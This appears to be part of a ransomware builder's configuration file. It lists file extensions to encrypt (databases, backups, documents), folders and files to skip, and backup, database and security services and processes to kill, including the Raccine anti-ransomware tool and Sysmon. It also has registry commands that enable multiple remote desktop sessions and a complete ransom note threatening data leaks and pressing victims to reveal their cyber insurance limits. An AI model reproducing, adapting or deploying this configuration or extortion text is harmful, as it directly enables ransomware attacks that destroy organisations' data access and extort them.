26=worm 27=sql;sqlite;sqlite3;sqlitedb;mdf;mdb;adb;db;db3;dbf;dbs;udb;dbv;dbx;edb;exb;1cd;fdb;idb;mpd;myd;odb;xls;xlsx;doc;docx;bac;bak;back;zip;rar;dt;4dd;4dl;abcddb;abs;abx;accdb;accdc;accde;accdr;accdt;accdw;accft;ade;adf;adn;adp;alf;arc;ask;bacpac;bdf;btr;cat;cdb;chck;ckp;cma;cpd;dacpac;dad;dadiagrams;daschema;db-shm;db-wal;db2;dbc;dbt;dcb;dct;dcx;ddl;dlis;dp1;dqy;dsk;dsn;dtsx;dxl;eco;ecx;epim;fcd;fic;fm5;fmp;fmp12;fmpsl;fol;fp3;fp4;fp5;fp7;fpt;frm;gdb;grdb;gwi;hdb;his;hjt;ib;icg;icr;ihx;itdb;itw;jet;jtx;kdb;kexi;kexic;kexis;lgc;lut;lwx;maf;maq;mar;mas;mav;maw;mdn;mdt;mrg;mud;mwb;ndf;nnt;nrmlib;ns2;ns3;ns4;nsf;nv;nv2;nwdb;nyf;oqy;ora;orx;owc;p96;p97;pan;pdb;pdm;pnz;qry;qvd;rbf;rctd;rod;rodx;rpd;rsd;s2db;sas7bdat;sbf;scx;sdb;sdc;sdf;sis;sl3;spq;sqlite2;te;temx;tmd;tps;trc;trm;udl;usr;v12;vis;vpd;vvv;wdb;wmdb;wrk;xdb;xld;xmlff; 28=386;cmd;deskthemepack;diagcab;diagcfg;diagpkg;dll;info;mui;sys;theme;tmp; 29=steamapps;Cache;Boot;Chrome;Firefox;Mozilla;Mozilla Firefox;MicrosoftEdge;Internet Explorer;Tor Browser;Opera;Opera Software;Common Files;Config.Msi;Intel;Microsoft;Microsoft Shared;Microsoft.NET;MSBuild;MSOCache;Packages;PerfLogs;ProgramData;System Volume Information;tmp;Temp;USOShared;Windows;Windows Defender;Windows Journal;Windows NT;Windows Photo Viewer;Windows Security;Windows.old;WindowsApps;WindowsPowerShell;WINNT;$RECYCLE.BIN;$WINDOWS.~BT;$Windows.~WS;:\Users\Public\;:\Users\Default\; 30=desktop.ini;iconcache.db;thumbs.db; 31=AcronisAgent;ARSM;backup;BackupExecAgentAccelerator;BackupExecAgentBrowser;BackupExecDiveciMediaService;BackupExecJobEngine;BackupExecManagementService;BackupExecRPCService;BackupExecVSSProvider;CAARCUpdateSvc;CASAD2DWebSvc;ccEvtMgr;ccSetMgr;Culserver;dbeng8;dbsrv12;DefWatch;FishbowlMySQL;GxBlr;GxCIMgr;GxCVD;GxFWD;GxVss;memtas;mepocs;msexchange;MSExchange$;msftesql-Exchange;msmdsrv;MSSQL;MSSQL$;MSSQL$KAV_CS_ADMIN_KIT;MSSQL$MICROSOFT##SSEE;MSSQL$MICROSOFT##WID;MSSQL$SBSMONITORING;MSSQL$SHAREPOINT;MSSQL$VEEAMSQL2012;MSSQLFDLauncher$SBSMONITORING;MSSQLFDLauncher$SHAREPOINT;MSSQLServerADHelper100;MVArmor;MVarmor64;svc$;sophos;RTVscan;MySQL57;PDVFSService;QBCFMonitorService;QBFCService;QBIDPService;QBVSS;SavRoam;SQL;SQLADHLP;sqlagent;SQLAgent$KAV_CS_ADMIN_KIT;SQLAgent$SBSMONITORING;SQLAgent$SHAREPOINT;SQLAgent$VEEAMSQL2012;sqlbrowser;Sqlservr;SQLWriter;stc_raw_agent;tomcat6;veeam;VeeamDeploymentService;VeeamNFSSvc;VeeamTransportSvc;vmware-converter;vmware-usbarbitator64;VSNAPVSS;vss;wrapper;WSBExchange;YooBackup;YooIT; 32=agntsvc;AutodeskDesktopApp;axlbridge;bedbh;benetns;bengien;beserver;CoreSync;Creative Cloud;dbeng50;dbsnmp;encsvc;EnterpriseClient;fbguard;fbserver;fdhost;fdlauncher;httpd;isqlplussvc;msaccess;MsDtSrvr;msftesql;mspub;mydesktopqos;mydesktopservice;mysqld;mysqld-nt;mysqld-opt;ocautoupds;ocomm;ocssd;oracle;pvlsvr;node;java;python;wpython;QBDBMgr;QBDBMgrN;QBIDPService;qbupdate;QBW32;QBW64;Raccine;Raccine_x86;RaccineElevatedCfg;RaccineSettings;VeeamDeploymentSvc;RAgui;raw_agent_svc;SimplyConnectionManager;sqbcoreservice;sql;sqlagent;sqlbrowser;sqlmangr;sqlservr;sqlwriter;Ssms;Sysmon;Sysmon64;tbirdconfig;tomcat6;vsnapvss;vxmon;wdswfsafe;wsa_service;wxServer;wxServerView;xfssvccon;1cv8s;1cv8;1cv8c; 33=add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" /v "AllowMultipleTSSessions" /t REG_DWORD /d 0x1 /f;reg add "HKLM\system\CurrentControlSet\Control\Terminal Server" /v "fSingleSessionPerUser" /t REG_DWORD /d 0x0 /f; 34=1 35=2 36=0 37=0 38=0 39=1 40=1 41=1 42=1 43=1 44=1 45=1 46=1 47=0 48=1 49=1 50=1 51=0 53=1 54=0 55=1 56=1 57=1 58=1 59=1 60=1 61=1 62=1 63=Hello my dear friend (Do not scan the files with antivirus in any case. In case of data loss, the consequences are yours)\nYour data is encrypted\nYour decryption ID is ID_PLACEHOLDER\nUnfortunately for you, a major IT security weakness left you open to attack, your files have been encrypted\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\nIf you want to recover your files, write us to this e-mail: [email protected]\nIn case of no answer in 24 hours write us to this backup e-mail: [email protected]\nOur online operator is available in the messenger Telegram: @DataSupport911 or https://t.me/DataSupport911\nCheck your e-mail "Spam" or "Junk" folder if you don't get answer more than 6 hours.\nContact us soon, because those who don't have their data leaked in our press release blog and the price they'll have to pay will go up significantly.\n\nAttention!\n\nDo not rename encrypted files. \nDo not try to decrypt your data using third party software - it may cause permanent data loss. \nWe are always ready to cooperate and find the best way to solve your problem. \nThe faster you write - the more favorable conditions will be for you. \nOur company values its reputation. We give all guarantees of your files decryption.\n\nWhat are your recommendations?\n- Never change the name of the files, if you want to manipulate the files, be sure to back them up. If there are any problems with the files, we are not responsible for them.\n- Never work with intermediary companies because they charge you more money. For example, if we ask you for 50,000$, they will tell you 55,000$. Don't be afraid of us, just email us. \n\nVery important! For those who have cyber insurance against ransomware attacks.\nInsurance companies require you to keep your insurance information secret, this is to never pay the maximum amount specified in the contract or to pay nothing at all, disrupting negotiations.\nThe insurance company will try to derail negotiations in any way they can so that they can later argue that you will be denied coverage because your insurance does not cover the ransom amount.\nFor example your company is insured for 10 million dollars, while negotiating with your insurance agent about the ransom he will offer us the lowest possible amount, for example 100 thousand dollars,\nwe will refuse the paltry amount and ask for example the amount of 15 million dollars, the insurance agent will never offer us the top threshold of your insurance of 10 million dollars.\nHe will do anything to derail negotiations and refuse to pay us out completely and leave you alone with your problem. If you told us anonymously that your company was insured for 10 million and other\nimportant details regarding insurance coverage, we would not demand more than 10 million in correspondence with the insurance agent. That way you would have avoided a leak and decrypted your information.\nBut since the sneaky insurance agent purposely negotiates so as not to pay for the insurance claim, only the insurance company wins in this situation. To avoid all this and get the money on the insurance,\nbe sure to inform us anonymously about the availability and terms of insurance coverage, it benefits both you and us, but it does not benefit the insurance company. Poor multimillionaire insurers will not\nstarve and will not become poorer from the payment of the maximum amount specified in the contract, because everyone knows that the contract is more expensive than money, so let them fulfill the conditions\nprescribed in your insurance contract, thanks to our interaction. 66=1